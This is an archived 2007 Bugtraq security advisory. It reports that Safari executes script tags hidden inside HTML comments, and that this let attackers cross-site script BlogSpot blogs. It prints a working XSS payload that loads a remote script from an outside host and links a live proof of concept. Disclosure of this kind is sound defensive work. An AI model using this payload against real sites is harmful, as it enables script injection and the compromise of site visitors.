| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 23 Jan 2007 00:44:13 -0700 From: Jose Avila III <jose@...ra.com> To: bugtraq@...urityfocus.com Cc: Jose Avila <jose@...ra.com> Subject: Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability Overview: Safari on occasions may improperly parse the source of an HTML document, which can lead to the execution of html tags within comments. This can become dangerous when input filters allow html tags within comments, as they will get parsed and executed under certain circumstances. Details: In some cases you can cause Appleās Safari browser to execute code when it should not be executed. In the following example everything within the comment, in theory should never be executed; however, safari decides to execute the script tag. <title>myblog<!--</title></head><body><script src=http://beanfuzz.com/ bean.js> --></title> Blogs hosted on BlogSpot.com have filter mechanisms for their input; however, they will allow you to inject anything within comments. This made it possible to cross site script blogspot.com. Note: Only Safari viewers will be affected. Proof of concept: http://dirtybean1234.blogspot.com/ Initial release of vulnerability: http://www.beanfuzz.com/wordpress/? p=99 Vendor Response: I was unable to get a response from the vendor in regards to this issue Questions / Comments: Jose (at) onzra (dot) com ---- Register for my RSA 2007 Training Course "Creative Web Protocol Attacks, Beyond Web Hacking" February 4, 5 2007 San Francisco https://cm.rsaconference.com/US07/catalog/eventguide/publicSchedule.jsp
Powered by blists - more mailing lists